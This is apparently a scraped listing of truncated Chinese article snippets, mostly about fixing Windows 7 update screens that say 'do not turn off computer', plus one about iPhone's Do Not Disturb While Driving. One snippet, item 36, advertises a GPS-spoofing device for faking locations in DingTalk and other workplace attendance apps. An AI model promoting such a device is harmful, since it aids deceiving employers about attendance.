  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57